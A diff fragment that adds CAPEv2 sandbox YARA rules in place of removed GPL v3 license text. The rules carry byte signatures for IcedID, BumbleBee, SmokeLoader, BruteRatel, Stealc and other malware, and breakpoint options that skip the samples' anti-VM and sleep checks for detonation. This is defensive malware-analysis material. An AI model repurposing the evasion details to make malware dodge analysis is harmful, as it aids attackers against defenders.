+ uint16(0)==0x5A4D and all of them +} +rule CAPE_Icedidhook +{ + meta: + description = "IcedID hook fix" + author = "kevoreilly" + id = "011c9cb7-8080-5f8a-9dca-6397e9bf7bf6" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L15-L25" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "fd62e0ed6f2a18472fa9336daee0e8a3a55e21779a8385394e85f96da928e24f" + score = 75 + quality = 70 + tags = "" + cape_options = "ntdll-protect=0" - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: + strings: + $hook = {C6 06 E9 83 E8 05 89 46 01 8D 45 ?? 50 FF 75 ?? 6A 05 56 6A FF E8 2D FA FF FF} - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or + condition: + any of them +} +rule CAPE_Icedidpackera : FILE +{ + meta: + description = "IcedID export selection" + author = "kevoreilly" + id = "d793d8a1-0e17-56ad-933c-470e2290867b" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L27-L40" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe" + logic_hash = "aa0681e7794546355e6d61f739c49035a493cdfca7e666531d74e3835ec44408" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export" - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or + strings: + $init = "init" + $export = {48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 81 EC [2] 00 00 41 8B E9 49 8B F0 48 8B FA 48 8B D9} + $alloc = {8B 50 50 33 C9 44 8D 49 40 41 B8 00 30 00 00 FF 15 [4] 48 89 44 24 28 [0-3] 48 89 84 24 ?? 00 00 00 E9} - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Icedidpackerb : FILE +{ + meta: + description = "IcedID export selection" + author = "kevoreilly" + id = "6bd0e64d-e60e-5cd2-af79-946a7f6dc9f5" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L42-L56" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "6517ef2c579002ec62ddeb01a3175917c75d79ceca355c415a4462922c715cb6" + logic_hash = "fde1e2c0124d180b2fa3d0675b35e8d78fdd7b06cd27e9228c148aa29ce30ee7" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export" - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or + strings: + $init = "init" + $export = {44 89 4C 24 20 4C 89 44 24 18 48 89 4C 24 08 41 55 41 56 41 57 48 81 EC ?? 00 00 00 B9 [2] 00 00 4C 8B EA E8} + $loop = {8B C2 48 8D 49 01 83 E0 07 FF C2 0F B6 44 30 ?? 30 41 FF 3B D5 72} - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Icedidpackerc : FILE +{ + meta: + description = "IcedID export selection" + author = "kevoreilly" + id = "fddfd0d2-1bc0-56bb-b983-5850e17a3d0f" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L58-L71" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "c06805b6efd482c1a671ec60c1469e47772c8937ec0496f74e987276fa9020a5" + hash = "265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844" + logic_hash = "f1e75e380ab0947fdfda012b7a5077a1c2ef51163239846ab2dc29cac95ba166" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export" - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. + strings: + $export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 3A ED 74} + $alloc = {41 B8 00 10 00 00 8B D0 33 C9 66 3B ?? (74|0F 84)} - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Icedidpackerd : FILE +{ + meta: + description = "IcedID export selection" + author = "kevoreilly" + id = "df0ca4bd-1ea6-57ef-b85a-7ed0e2a20831" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L73-L86" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "7b226f8cc05fa7d846c52eb0ec386ab37f9bae04372372509daa6bacc9f885d8" + logic_hash = "6685e0246f5a11ce0ca33447837de06506b447a5f8591423e2b76f2ab0274dc7" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "export=$export" - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. + strings: + $init = "init" + $export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 66 3B ED 74} + $load = {41 B8 00 80 00 00 33 D2 48 8B 4C [2] EB ?? B9 69 04 00 00 E8 [4] 48 89 84 [2] 00 00 00 66 3B ED 74} - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Icedsleep : FILE +{ + meta: + description = "IcedID sleep bypass" + author = "kevoreilly" + id = "d6bd708b-47bc-5620-b40e-8fe5f1a67ba4" + date = "2023-11-28" + modified = "2023-11-28" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/IcedID.yar#L88-L99" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0b1a8be95b1b8a3b066837f9e47561ee8202d741b39d64e626c0461c2fbf7c70" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "force-sleepskip=1" + packed = "e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7" - 8. Termination. + strings: + $sleep = {89 4C 24 08 48 83 EC 38 8B 44 24 40 48 69 C0 10 27 00 00 48 F7 D8 48 89 44 24 20 48 8D 54 24 20 33 C9 FF 15 [4] 48 83 C4 38 C3} - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Bumblebee : FILE +{ + meta: + description = "BumbleBee Anti-VM Bypass" + author = "enzo & kevoreilly" + id = "85e2c9fd-86de-57c8-99ec-de2cc3996876" + date = "2023-02-08" + modified = "2023-02-08" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/BumbleBee.yar#L34-L46" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0a632a0b30b28d544880eb1cfdd85e95f455c343d60f8d6922d4196ef7415961" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$antivm1+2,bp1=$antivm2+2,bp1=$antivm3+38,action0=jmp,action1=skip,count=0,force-sleepskip=1" - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. + strings: + $antivm1 = {84 C0 74 09 33 C9 FF [4] 00 CC 33 C9 E8 [3] 00 4? 8B C8 E8} + $antivm2 = {84 C0 0F 85 [2] 00 00 33 C9 E8 [4] 48 8B C8 E8 [4] 48 8D 85} + $antivm3 = {33 C9 E8 [4] 48 8B C8 E8 [4] 83 CA FF 48 8B 0D [4] FF 15 [4] E8 [4] 84 c0} - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Smokeloader : FILE +{ + meta: + description = "SmokeLoader Payload" + author = "kevoreilly" + id = "9df0eca1-009f-5e7e-af9f-9529581fb4b4" + date = "2023-02-06" + modified = "2023-02-06" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/SmokeLoader.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "4b15162f4b754cdd6a9124f29f0fd979085734063a0b17f2a97a9750f29e2e0b" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$gate+19,action0=DumpSectionViews,count=1" - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. + strings: + $gate = {68 [2] 00 00 50 E8 [4] 8B 45 ?? 89 F1 8B 55 ?? 9A [2] 40 00 33 00 89 F9 89 FA 81 C1 [2] 00 00 81 C2 [2] 00 00 89 0A 8B 46 ?? 03 45 ?? 8B 4D ?? 8B 55 ?? 9A [2] 40 00 33 00} - 9. Acceptance Not Required for Having Copies. + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Themida : FILE +{ + meta: + description = "Themida detonation shim" + author = "kevoreilly" + id = "cd5c8b08-4864-57f7-b218-1bcb6892bea8" + date = "2024-09-11" + modified = "2024-09-11" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Themida.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "c4f1e01a3fe3cb66062ce03253bfe9edc09dc6f1a77db99b281106e8ceff9257" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "unhook-apis=NtSetInformationThread,force-sleepskip=0" + packed = "6337ff4cf413f56cc6c9a8e67f24b8d7f94f620eae06ac9f0b113b5ba82ea176" - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. + strings: + $code = {FC 31 C9 49 89 CA 31 C0 31 DB AC 30 C8 88 E9 88 D5 88 F2 B6 08 66 D1 EB 66 D1 D8 73 09} - 10. Automatic Licensing of Downstream Recipients. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Mysterysnail +{ + meta: + description = "MysterySnail anti-sandbox bypass" + author = "kevoreilly" + id = "dfeb820a-3101-5588-8348-3b62a6900538" + date = "2021-10-16" + modified = "2021-10-16" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/MysterySnail.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "9402dbbbfdd286e2309ee83fc08194f70f73657a3a4e3785dfbcb564dbee86a8" + score = 75 + quality = 70 + tags = "" + cape_options = "bp0=$anti+62,action0=skip,count=0" - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. + strings: + $anti = {F2 0F 10 [3] 66 0F 2F 05 [4] 76 0A 8B [3] FF C0 89 [3] B9 5B 05 00 00 FF 15 [4] E8 [4] 89 [3] 8B [3] 8B [3] 2B C8 8B C1 3B [3] 7E 16} - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. + condition: + any of them +} +rule CAPE_NSIS : FILE +{ + meta: + description = "NSIS Integrity Check function" + author = "kevoreilly" + id = "15b5a97e-4212-5383-9d4c-2f8e6e1ef2f5" + date = "2023-04-21" + modified = "2023-04-21" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/NSIS.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "d0c1e946f02503a290d24637b5c522145f58372a9ded9e647d24cd904552d235" + logic_hash = "64ce83f2c955f7f4a21f22e7e558914273efb7032f4d644b7775214d81969bb8" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "exclude-apis=LdrLoadDll" - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. + strings: + $check = {6A 1C 8D 45 [3-8] E8 [4] 8B 45 ?? A9 F0 FF FF FF 75 ?? 81 7D ?? EF BE AD DE 75 ?? 81 7D ?? 49 6E 73 74 75 ?? 81 7D ?? 73 6F 66 74 75 ?? 81 7D ?? 4E 75 6C 6C 75 ?? 09 45 08 8B 45 08 8B 0D [4] 83 E0 02 09 05 [4] 8B 45 ?? 3B C6 89 0D [4] 0F 8? [2] 00 00 F6 45 08 08 75 06 F6 45 08 04 75} - 11. Patents. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Anticuckoo : FILE +{ + meta: + description = "AntiCuckoo bypass: https://github.com/therealdreg/anticuckoo" + author = "kevoreilly" + id = "e221e57b-313e-5998-a3fc-5b4e9671b989" + date = "2023-03-17" + modified = "2023-03-17" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/AntiCuckoo.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "ad5e52f144bb4a1dae3090978c6ecb4c7732538c9b62a6cedd32eccee6094be5" + logic_hash = "a039aeca2dae44980e8bffafacfda90975e107001be50f11ac916b35ad43592e" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$HKActivOldStackCrash+36,action0=jmp,count=1" - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". + strings: + $HKActivOldStackCrash = {5B 81 FB FA FA FA FA 74 01 41 3B E0 75 ?? 83 E9 0B 83 F9 04 7F 04 C6 45 ?? 00 89 4D ?? 89 65 ?? 80 7D ?? 00 74} - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Cargobayloader : FILE +{ + meta: + description = "CargoBayLoader anti-vm bypass" + author = "kevoreilly" + id = "5b347863-0bea-55d2-aaf3-b3d6e604be89" + date = "2023-02-20" + modified = "2023-02-20" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/CargoBayLoader.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "75e975031371741498c5ba310882258c23b39310bd258239277708382bdbee9c" + logic_hash = "1d5c4ca79f97e1fac358189a8c6530be12506974fc2fb42f63b0b621536a45c9" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$jmp1+4,action0=skip,bp1=$jmp2+2,action1=skip,count=1,force-sleepskip=1" - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. + strings: + $jmp1 = {40 42 0F 00 0F 82 [2] 00 00 48 8D 15 [4] BF 04 00 00 00 41 B8 04 00 00 00 4C 8D [3] 4C 89 F1 E8} + $jmp2 = {84 DB 0F 85 [2] 00 00 48 8D 15 [4] 41 BE 03 00 00 00 41 B8 03 00 00 00 4C 8D 7C [2] 4C 89 F9 E8} - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Doomedloader : FILE +{ + meta: + description = "No description has been set in the source file - CAPE" + author = "kevoreilly" + id = "88436e71-360e-5719-989f-24e71591ebe0" + date = "2024-07-25" + modified = "2024-07-25" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/DoomedLoader.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "54a5962ef49ebf987908c4ea1559788f7c96a7e4ea61d2973636e998a0239c77" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "clear,bp0=$anti*-4,action0=setzeroflag,sysbp=$syscall+7,count=0,procdump=2" + packed = "914b1b3180e7ec1980d0bafe6fa36daade752bb26aec572399d2f59436eaa635" - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. + strings: + $anti = {48 8B 4C 24 ?? E8 [4] 84 C0 B8 [4] 41 0F 45 C6 EB} + $syscall = {49 89 CA 8B 44 24 08 FF 64 24 10} - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Bruteratelsyscall +{ + meta: + description = "BruteRatel Syscall Bypass" + author = "kevoreilly" + id = "0ddc3e0a-c4ca-5342-b029-107ce1f2751e" + date = "2024-07-22" + modified = "2024-07-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/BruteRatel.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "5ed054b3cd5d2659c250945d55d6adac90945963c34ad2af0f8d7436141e86b6" + score = 75 + quality = 70 + tags = "" + cape_options = "sysbp=$syscall1+6,sysbp=$syscall2+8" - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. + strings: + $syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)} + $syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24} - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. + condition: + all of them +} +rule CAPE_Bruteratelpacker +{ + meta: + description = "BruteRatel Outer Encryption Layer" + author = "kevoreilly" + id = "631083be-7058-590a-a394-984545f42ad7" + date = "2024-07-22" + modified = "2024-07-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/BruteRatel.yar#L14-L26" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "2ccb17efe378d034df34d20d7580c58171d0fd11c18fef6c9a23f1ba238514e6" + score = 75 + quality = 70 + tags = "" + cape_options = "bp1=$outer*,action1=scan,count=0" - 12. No Surrender of Others' Freedom. + strings: + $outer = {83 45 F8 01 81 7D F8 FF 00 00 00 7E ?? 83 45 FC 01 8B 45 FC 3B 45 ?? 7E ?? 48} + $inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF} + $date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00} - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. + condition: + ($outer) and not ($inner) and not ($date) +} +rule CAPE_Bruterateldate +{ + meta: + description = "BruteRatel Date Check Bypass" + author = "kevoreilly" + id = "94dd5cf3-ed59-51d6-92c8-aee73fe2926b" + date = "2024-07-22" + modified = "2024-07-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/BruteRatel.yar#L28-L39" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "88589b2d08aea03565668ff1b9af20b6fe11cda50d867c60db7cb4d1826b0fd7" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,bp1=$inner*,action1=scan,bp2=$date+6,action2=skip,count=0" - 13. Use with the GNU Affero General Public License. + strings: + $inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF} + $date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00} - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. + condition: + any of them +} +rule CAPE_Bruteratelconfig +{ + meta: + description = "BruteRatel Config Extraction" + author = "kevoreilly" + id = "5ae680b0-5ad2-5e82-87f8-b0af4fec18de" + date = "2024-07-22" + modified = "2024-07-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/BruteRatel.yar#L41-L51" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "b1815aafec940ab6c8daafc68ccf294845221ada260de5209dcb7e49ccd061c7" + score = 75 + quality = 70 + tags = "" + cape_options = "clear,br1=$decode,count=0,action0=string:eax,typestring=BruteRatel Config" - 14. Revised Versions of this License. + strings: + $decode = {55 57 56 53 48 83 EC ?? 31 C0 48 89 CB 48 89 D7 44 89 C6 44 89 CD 44 39 01 77 ?? 41 8D 48 01 E8 [4] 31 C9} - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. + condition: + all of them +} +rule CAPE_Stealcanti : FILE +{ + meta: + description = "Stealc detonation bypass" + author = "kevoreilly" + id = "32e5c1cf-ef57-58eb-9deb-fab0064cc676" + date = "2024-01-19" + modified = "2024-01-19" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Stealc.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d" + logic_hash = "4132e8094b0b49a89e9f40a8b1a6abbf105bbb04e4ddf3ce739e39fc2baf0d13" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$anti+17,action0=skip,count=1" - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. + strings: + $anti = {53 57 57 57 FF 15 [4] 8B F0 74 03 75 01 B8 E8 [4] 74 03 75 01 B8} + $decode = {6A 03 33 D2 8B F8 59 F7 F1 8B C7 85 D2 74 04 2B C2 03 C1 6A 06 C1 E0 03 33 D2 59 F7 F1} - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. + condition: + uint16(0)==0x5A4D and all of them +} +rule CAPE_Stealcstrings : FILE +{ + meta: + description = "Stealc string decryption" + author = "kevoreilly" + id = "087b5532-e1e7-5df9-adb2-bf758c8ba352" + date = "2024-01-19" + modified = "2024-01-19" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/analyzer/windows/data/yara/Stealc.yar#L15-L26" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6d402446a979c00b6257ace9924db381d98c530b22968bd2776c66d58c7faefc" + score = 75 + quality = 70 + tags = "FILE" + cape_options = "bp0=$decode+17,action0=string:edx,count=1,typestring=Stealc Strings" + packed = "d0c824e886f14b8c411940a07dc133012b9eed74901b156233ac4cac23378add" - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. + strings: + $decode = {51 8B 15 [4] 52 8B 45 ?? 50 E8 [4] 83 C4 0C 6A 04 6A 00 8D 4D ?? 51 FF 15 [4] 83 C4 0C 8B 45 ?? 8B E5 5D C3} - 15. Disclaimer of Warranty. + condition: + uint16(0)==0x5A4D and any of them +} +rule CAPE_Zloader : FILE +{ + meta: + description = "Zloader API Spam 